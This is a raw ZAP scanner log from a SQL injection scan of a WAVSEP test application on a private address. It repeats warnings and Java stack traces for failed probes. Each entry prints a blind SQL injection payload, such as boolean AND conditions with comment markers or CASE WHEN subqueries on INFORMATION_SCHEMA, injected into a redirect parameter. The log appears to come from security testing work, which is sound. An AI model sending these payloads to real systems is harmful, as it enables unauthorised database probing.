I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 8813=8813 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682015 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1618=2117 AND 'aFxy'='aFxy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1618=2117 AND 'aFxy'='aFxy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682016 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 5534=4519 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 5534=4519 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682017 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2982=6556 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2982=6556 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682018 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7644=2646-- sDED] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7644=2646-- sDED at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682018 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7855=7855 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7855=7855 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682019 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3654=3654-- ittm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3654=3654-- ittm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682019 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2982=6556 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2982=6556 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682020 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7644=2646-- sDED] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7644=2646-- sDED at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682020 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6569=8298-- JESc] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6569=8298-- JESc at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682022 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9672=9672-- lWmP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9672=9672-- lWmP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682022 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (4073=3027) THEN 4073 ELSE 4073*(SELECT 4073 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (4073=3027) THEN 4073 ELSE 4073*(SELECT 4073 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682023 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6569=8298-- JESc] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6569=8298-- JESc at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682023 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (2023=2023) THEN 2023 ELSE 2023*(SELECT 2023 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (2023=2023) THEN 2023 ELSE 2023*(SELECT 2023 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682024 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9429=5994) THEN 9429 ELSE 9429*(SELECT 9429 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (9429=5994) THEN 9429 ELSE 9429*(SELECT 9429 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at 